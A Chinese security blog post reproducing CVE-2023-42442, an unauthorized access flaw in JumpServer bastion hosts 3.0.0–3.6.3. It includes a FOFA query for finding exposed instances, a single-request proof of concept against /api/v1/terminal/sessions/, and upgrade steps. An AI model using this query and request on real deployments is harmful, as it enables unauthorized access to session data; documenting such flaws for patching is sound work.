【漏洞复现】JumpServer未授权访问漏洞(CVE-2023-42442)

1、简介

JumpServer是一款符合4A规范的开源堡垒机,帮助企业以更安全的方式管控和登录各种类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。

2、漏洞描述

JumpServer 在 3.0.0-3.6.3 版本存在未授权访问漏洞。由于系统权限配置存在不合理,导致未授权攻击者可以直接访问 /api/v1/terminal/sessions/ 相关路由
漏洞公告:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw

3、受影响版本

3.0.0 <= JumpServer <= 3.6.3

4、FOFA语

fofa:app="JumpServer-堡垒机"

5、漏洞复现

POC

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

6、整改建议

升级到安全版本:JumpServer >= 3.5.5 JumpServer >= 3.6.4

./jmsctl.sh backup_db  #备份数据库
./jmsctl.sh check_update  #检查可用更新
./jmsctl.sh upgrade [version]  #升级指定版本
./jmsctl.sh start  #启动jumpserver
posted @ 2023-09-18 21:51  小C学安全  阅读(3310)  评论(0编辑  收藏  举报